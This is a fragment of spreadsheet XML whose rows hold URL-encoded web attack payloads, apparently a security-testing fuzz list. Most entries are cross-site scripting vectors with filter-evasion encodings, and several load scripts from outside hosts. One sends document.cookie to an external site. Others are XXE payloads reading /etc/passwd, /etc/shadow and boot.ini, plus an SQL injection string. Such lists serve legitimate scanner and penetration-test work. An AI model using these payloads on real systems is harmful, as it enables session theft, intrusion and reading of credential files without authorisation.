      <c r="A2494" s="3" t="s">
        <v>1299</v>
      </c>
      <c r="B2494" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22Set-Cookie%22%20Content%3D%22USERID%3D%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="2495">
      <c r="A2495" s="3" t="s">
        <v>1300</v>
      </c>
      <c r="B2495" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chead%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT%3D%22text%2Fhtml%3B%20charset%3DUTF-7%22%3E%20%3C%2FHEAD%3E%2BADw-SCRIPT%2BAD4-document.vulnerable%3Dtrue%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="2496">
      <c r="A2496" s="3" t="s">
        <v>1301</v>
      </c>
      <c r="B2496" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%23document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2497">
      <c r="A2497" s="3" t="s">
        <v>1302</v>
      </c>
      <c r="B2497" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20onmouseover%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2498">
      <c r="A2498" s="3" t="s">
        <v>1303</v>
      </c>
      <c r="B2498" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2499">
      <c r="A2499" s="3" t="s">
        <v>1304</v>
      </c>
      <c r="B2499" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20dynsrc%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2500">
      <c r="A2500" s="3" t="s">
        <v>1305</v>
      </c>
      <c r="B2500" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20type%3D%22image%22%20dynsrc%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2501">
      <c r="A2501" s="3" t="s">
        <v>1306</v>
      </c>
      <c r="B2501" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbgsound%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2502">
      <c r="A2502" s="3" t="s">
        <v>1307</v>
      </c>
      <c r="B2502" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2503">
      <c r="A2503" s="3" t="s">
        <v>1308</v>
      </c>
      <c r="B2503" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%7Bdocument.vulnerable%3Dtrue%3B%7D%3B</v>
      </c>
    </row>
    <row r="2504">
      <c r="A2504" s="3" t="s">
        <v>1309</v>
      </c>
      <c r="B2504" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%26%7Bdocument.vulnerable%3Dtrue%3B%7D%3B%3E</v>
      </c>
    </row>
    <row r="2505">
      <c r="A2505" s="3" t="s">
        <v>1310</v>
      </c>
      <c r="B2505" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Clink%20rel%3D%22stylesheet%22%20href%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2506">
      <c r="A2506" s="3" t="s">
        <v>1311</v>
      </c>
      <c r="B2506" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22vbscript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2507">
      <c r="A2507" s="3" t="s">
        <v>1312</v>
      </c>
      <c r="B2507" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22mocha%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2508">
      <c r="A2508" s="3" t="s">
        <v>1313</v>
      </c>
      <c r="B2508" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22livescript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2509">
      <c r="A2509" s="3" t="s">
        <v>1314</v>
      </c>
      <c r="B2509" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22about%3A%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="2510">
      <c r="A2510" s="3" t="s">
        <v>1315</v>
      </c>
      <c r="B2510" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2511">
      <c r="A2511" s="3" t="s">
        <v>1316</v>
      </c>
      <c r="B2511" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onload%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2512">
      <c r="A2512" s="3" t="s">
        <v>1317</v>
      </c>
      <c r="B2512" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22background-image%3A%20url%28javascript%3Adocument.vulnerable%3Dtrue%3B%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2513">
      <c r="A2513" s="3" t="s">
        <v>1318</v>
      </c>
      <c r="B2513" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22behaviour%3A%20url%28%5Blink%20to%20code%5D%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2514">
      <c r="A2514" s="3" t="s">
        <v>1319</v>
      </c>
      <c r="B2514" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22binding%3A%20url%28%5Blink%20to%20code%5D%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2515">
      <c r="A2515" s="3" t="s">
        <v>1320</v>
      </c>
      <c r="B2515" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22width%3A%20expression%28document.vulnerable%3Dtrue%3B%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2516">
      <c r="A2516" s="3" t="s">
        <v>1321</v>
      </c>
      <c r="B2516" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20type%3D%22text%2Fjavascript%22%3Edocument.vulnerable%3Dtrue%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2517">
      <c r="A2517" s="3" t="s">
        <v>1322</v>
      </c>
      <c r="B2517" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20classid%3D%22clsid%3A...%22%20codebase%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2518">
      <c r="A2518" s="3" t="s">
        <v>1323</v>
      </c>
      <c r="B2518" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3C%21--%3C%2Fstyle%3E%3Cscript%3Edocument.vulnerable%3Dtrue%3B%2F%2F--%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2519">
      <c r="A2519" s="3" t="s">
        <v>1324</v>
      </c>
      <c r="B2519" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2520">
      <c r="A2520" s="3" t="s">
        <v>1325</v>
      </c>
      <c r="B2520" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%5B%3C%21--%5D%5D%3Cscript%3Edocument.vulnerable%3Dtrue%3B%2F%2F--%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2521">
      <c r="A2521" s="3" t="s">
        <v>1326</v>
      </c>
      <c r="B2521" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%20--%20--%3E%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E%3C%21--%20--%20--%3E</v>
      </c>
    </row>
    <row r="2522">
      <c r="A2522" s="3" t="s">
        <v>1327</v>
      </c>
      <c r="B2522" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22blah%22onmouseover%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2523">
      <c r="A2523" s="3" t="s">
        <v>1328</v>
      </c>
      <c r="B2523" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22blah%3E%22%20onmouseover%3D%22document.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2524">
      <c r="A2524" s="3" t="s">
        <v>1329</v>
      </c>
      <c r="B2524" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2525">
      <c r="A2525" s="3" t="s">
        <v>1330</v>
      </c>
      <c r="B2525" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cxml%20id%3D%22X%22%3E%3Ca%3E%3Cb%3E%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E%3B%3C%2Fb%3E%3C%2Fa%3E%3C%2Fxml%3E</v>
      </c>
    </row>
    <row r="2526">
      <c r="A2526" s="3" t="s">
        <v>1331</v>
      </c>
      <c r="B2526" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20datafld%3D%22b%22%20dataformatas%3D%22html%22%20datasrc%3D%22%23X%22%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="2527">
      <c r="A2527" s="3" t="s">
        <v>1332</v>
      </c>
      <c r="B2527" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5B%5CxC0%5D%5B%5CxBC%5Dscript%3Edocument.vulnerable%3Dtrue%3B%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E</v>
      </c>
    </row>
    <row r="2528">
      <c r="A2528" s="3" t="s">
        <v>1333</v>
      </c>
      <c r="B2528" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40import%27http%3A%2F%2Fwww.securitycompass.com%2Fxss.css%27%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2529">
      <c r="A2529" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="B2529" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22Link%22%20Content%3D%22%3Chttp%3A%2F%2Fwww.securitycompass.com%2Fxss.css%3E%3B%20REL%3Dstylesheet%22%3E</v>
      </c>
    </row>
    <row r="2530">
      <c r="A2530" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="B2530" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fwww.securitycompass.com%2Fxssmoz.xml%23xss%22%29%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2531">
      <c r="A2531" s="3" t="s">
        <v>1336</v>
      </c>
      <c r="B2531" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20TYPE%3D%22text%2Fx-scriptlet%22%20DATA%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fscriptlet.html%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="2532">
      <c r="A2532" s="3" t="s">
        <v>1337</v>
      </c>
      <c r="B2532" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%20xmlns%3Axss%3E%3C%3Fimport%20namespace%3D%22xss%22%20implementation%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.htc%22%3E%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E%3C%2Fhtml%3E</v>
      </c>
    </row>
    <row r="2533">
      <c r="A2533" s="3" t="s">
        <v>1338</v>
      </c>
      <c r="B2533" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.jpg%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2534">
      <c r="A2534" s="3" t="s">
        <v>1339</v>
      </c>
      <c r="B2534" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27%3CSCR%27%22--%3E%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%3A%2F%2Fwww.securitycompass.com%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E</v>
      </c>
    </row>
    <row r="2535">
      <c r="A2535" s="3" t="s">
        <v>1340</v>
      </c>
      <c r="B2535" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2536">
      <c r="A2536" s="3" t="s">
        <v>1341</v>
      </c>
      <c r="B2536" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%3D%22%3E%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2537">
      <c r="A2537" s="3" t="s">
        <v>1342</v>
      </c>
      <c r="B2537" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%22%3E%22%20%27%27%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2538">
      <c r="A2538" s="3" t="s">
        <v>1343</v>
      </c>
      <c r="B2538" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%22a%3D%27%3E%27%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2539">
      <c r="A2539" s="3" t="s">
        <v>1344</v>
      </c>
      <c r="B2539" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%60%3E%60%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2540">
      <c r="A2540" s="3" t="s">
        <v>1345</v>
      </c>
      <c r="B2540" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20a%3D%22%3E%27%3E%22%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2541">
      <c r="A2541" s="3" t="s">
        <v>1346</v>
      </c>
      <c r="B2541" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2542">
      <c r="A2542" s="3" t="s">
        <v>1347</v>
      </c>
      <c r="B2542" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22binding%3A%20url%28http%3A%2F%2Fwww.securitycompass.com%2Fxss.js%29%3B%22%3E%20%5BMozilla%5D</v>
      </c>
    </row>
    <row r="2543">
      <c r="A2543" s="3" t="s">
        <v>1466</v>
      </c>
      <c r="B2543" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3B%3E%3B%3C%3BBODY%20onload%21%23%24%25%26%3B%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%3BXSS%22%3B%29%3E%3B</v>
      </c>
    </row>
    <row r="2544">
      <c r="A2544" s="3" t="s">
        <v>1467</v>
      </c>
      <c r="B2544" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%2Fscript%3E%3B%3C%3Bscript%3E%3Balert%281%29%3C%3B%2Fscript%3E%3B</v>
      </c>
    </row>
    <row r="2545">
      <c r="A2545" s="3" t="s">
        <v>1468</v>
      </c>
      <c r="B2545" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%2Fbr%20style%3Da%3Aexpression%28alert%28%29%29%3E%3B</v>
      </c>
    </row>
    <row r="2546">
      <c r="A2546" s="3" t="s">
        <v>1469</v>
      </c>
      <c r="B2546" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Bscrscriptipt%3E%3Balert%281%29%3C%3B%2Fscrscriptipt%3E%3B</v>
      </c>
    </row>
    <row r="2547">
      <c r="A2547" s="3" t="s">
        <v>1470</v>
      </c>
      <c r="B2547" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Bbr%20size%3D%5C%22%3B%26%3B%7Balert%28%26%23039%3BXSS%26%23039%3B%29%7D%5C%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2548">
      <c r="A2548" s="3" t="s">
        <v>1471</v>
      </c>
      <c r="B2548" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%26%23039%3Bprint%20%5C%22%3B%3C%3BIMG%20SRC%3Djava%5C0script%3Aalert%28%5C%22%3BXSS%5C%22%3B%29%3E%3B%5C%22%3B%3B%26%23039%3B%20%3E%3B%20out</v>
      </c>
    </row>
    <row r="2549">
      <c r="A2549" s="3" t="s">
        <v>1472</v>
      </c>
      <c r="B2549" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%26%23039%3Bprint%20%5C%22%3B%3C%3BSCR%5C0IPT%3E%3Balert%28%5C%22%3BXSS%5C%22%3B%29%3C%3B%2FSCR%5C0IPT%3E%3B%5C%22%3B%3B%26%23039%3B%20%3E%3B%20out</v>
      </c>
    </row>
    <row r="2550">
      <c r="A2550" s="3" t="s">
        <v>1355</v>
      </c>
      <c r="B2550" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3E</v>
      </c>
    </row>
    <row r="2551">
      <c r="A2551" s="3" t="s">
        <v>1356</v>
      </c>
      <c r="B2551" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28window.location%3D%22http%3A%2F%2Fwww.procheckup.com%2F%3Fsid%3D%22%252bdocument.cookie%29%3E</v>
      </c>
    </row>
    <row r="2552">
      <c r="A2552" s="3" t="s">
        <v>1355</v>
      </c>
      <c r="B2552" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3E</v>
      </c>
    </row>
    <row r="2553">
      <c r="A2553" s="3" t="s">
        <v>1357</v>
      </c>
      <c r="B2553" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%20STYLE%3Dxss%3Aexpression%28alert%28%27XSS%27%29%29%3E</v>
      </c>
    </row>
    <row r="2554">
      <c r="A2554" s="3" t="s">
        <v>1473</v>
      </c>
      <c r="B2554" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3EXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3EXSS%20STYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3E%3C%2FXSS%20STYLE%3Dxss%3Aexpression%28alert%28%27XSS%27%29%29%3E%3E%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%26</v>
      </c>
    </row>
    <row r="2555">
      <c r="A2555" s="3" t="s">
        <v>1474</v>
      </c>
      <c r="B2555" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3CSTYLE%3E%40importjavascript%3Aalert%28%27XSS%27%29%22%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="2556">
      <c r="A2556" s="3" t="s">
        <v>1475</v>
      </c>
      <c r="B2556" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%22%27%3E%3Cimg%2520src%253D%2526%2523x6a%3B%2526%2523x61%3B%2526%2523x76%3B%2526%2523x61%3B%2526%2523x73%3B%2526%2523x63%3B%2526%2523x72%3B%2526%2523x69%3B%2526%2523x70%3B%2526%2523x74%3B%2526%2523x3a%3Balert%28%2526quot%3B%2526%2523x20%3BXSS%2526%2523x20%3BTest%2526%2523x20%3BSuccessful%2526quot%3B%29%3E</v>
      </c>
    </row>
    <row r="2557">
      <c r="A2557" s="3" t="s">
        <v>1476</v>
      </c>
      <c r="B2557" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%2522%2527%3E%3Cimg%2520src%253d%2522javascript%3Aalert%28%2527%2520XSS%2527%29%2522%3E</v>
      </c>
    </row>
    <row r="2558">
      <c r="A2558" s="5" t="s">
        <v>1477</v>
      </c>
      <c r="B2558" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25uff1cscript%25uff1ealert%28%27XSS%27%29%25uff1c%2Fscript%25uff1e%27</v>
      </c>
    </row>
    <row r="2559">
      <c r="A2559" s="5" t="s">
        <v>462</v>
      </c>
      <c r="B2559" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="2560">
      <c r="A2560" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B2560" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2561">
      <c r="A2561" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B2561" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="2562">
      <c r="A2562" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B2562" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="2563">
      <c r="A2563" s="3" t="s">
        <v>1478</v>
      </c>
      <c r="B2563" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%26quot%3BXSS%3CWBR%3E%26quot%3B%29%3E</v>
      </c>
    </row>
    <row r="2564">
      <c r="A2564" s="3" t="s">
        <v>1479</v>
      </c>
      <c r="B2564" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMGSRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%3CWBR%3E%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%3CWBR%3E%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%3CWBR%3E%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3CWBR%3E%3B%26%2383%3B%26%2339%3B%26%2341%3E</v>
      </c>
    </row>
    <row r="2565">
      <c r="A2565" s="3" t="s">
        <v>1480</v>
      </c>
      <c r="B2565" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMGSRC%3D%26%230000106%26%230000097%26%3CWBR%3E%230000118%26%230000097%26%230000115%26%3CWBR%3E%230000099%26%230000114%26%230000105%26%3CWBR%3E%230000112%26%230000116%26%230000058%26%3CWBR%3E%230000097%26%230000108%26%230000101%26%3CWBR%3E%230000114%26%230000116%26%230000040%26%3CWBR%3E%230000039%26%230000088%26%230000083%26%3CWBR%3E%230000083%26%230000039%26%230000041%3E</v>
      </c>
    </row>
    <row r="2566">
      <c r="A2566" s="3" t="s">
        <v>1481</v>
      </c>
      <c r="B2566" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMGSRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%3CWBR%3E%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%3CWBR%3E%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%3CWBR%3E%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E</v>
      </c>
    </row>
    <row r="2567">
      <c r="A2567" s="3" t="s">
        <v>1482</v>
      </c>
      <c r="B2567" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%3CWBR%3E%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2568">
      <c r="A2568" s="3" t="s">
        <v>1483</v>
      </c>
      <c r="B2568" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%3CWBR%3E%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2569">
      <c r="A2569" s="3" t="s">
        <v>1484</v>
      </c>
      <c r="B2569" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%5BCDATA%5B%3Cscript%3Evar%20n%3D0%3Bwhile%28true%29%7Bn%2B%2B%3B%7D%3C%2Fscript%3E%5D%5D%3E</v>
      </c>
    </row>
    <row r="2570">
      <c r="A2570" s="3" t="s">
        <v>1485</v>
      </c>
      <c r="B2570" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3Cfoo%3E%3C%21%5BCDATA%5B%3C%5D%5D%3ESCRIPT%3C%21%5BCDATA%5B%3E%5D%5D%3Ealert%28%27gotcha%27%29%3B%3C%21%5BCDATA%5B%3C%5D%5D%3E%2FSCRIPT%3C%21%5BCDATA%5B%3E%5D%5D%3E%3C%2Ffoo%3E</v>
      </c>
    </row>
    <row r="2571">
      <c r="A2571" s="3" t="s">
        <v>1486</v>
      </c>
      <c r="B2571" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3Cfoo%3E%3C%21%5BCDATA%5B%27%20or%201%3D1%20or%20%27%27%3D%27%5D%5D%3E%3C%2Ffoof%3E</v>
      </c>
    </row>
    <row r="2572">
      <c r="A2572" s="3" t="s">
        <v>1487</v>
      </c>
      <c r="B2572" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%22%3E%5D%3E%3Cfoo%3E%26xee%3B%3C%2Ffoo%3E</v>
      </c>
    </row>
    <row r="2573">
      <c r="A2573" s="3" t="s">
        <v>1488</v>
      </c>
      <c r="B2573" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xee%3B%3C%2Ffoo%3E</v>
      </c>
    </row>
    <row r="2574">
      <c r="A2574" s="3" t="s">
        <v>1489</v>
      </c>
      <c r="B2574" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fshadow%22%3E%5D%3E%3Cfoo%3E%26xee%3B%3C%2Ffoo%3E</v>
      </c>
    </row>
    <row r="2575">
      <c r="A2575" s="3" t="s">
        <v>1490</v>
      </c>
      <c r="B2575" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fdev%2Frandom%22%3E%5D%3E%3Cfoo%3E%26xee%3B%3C%2Ffoo%3E</v>
      </c>
    </row>
    <row r="2576">
      <c r="A2576" s="3" t="s">
        <v>1491</v>
      </c>
      <c r="B2576" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2577">
      <c r="A2577" s="3" t="s">
        <v>1492</v>
      </c>
      <c r="B2577" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%253cscript%253ealert%28%27XSS%27%29%253c%2Fscript%253e</v>
      </c>
    </row>
    <row r="2578">
      <c r="A2578" s="3" t="s">
        <v>1493</v>
      </c>
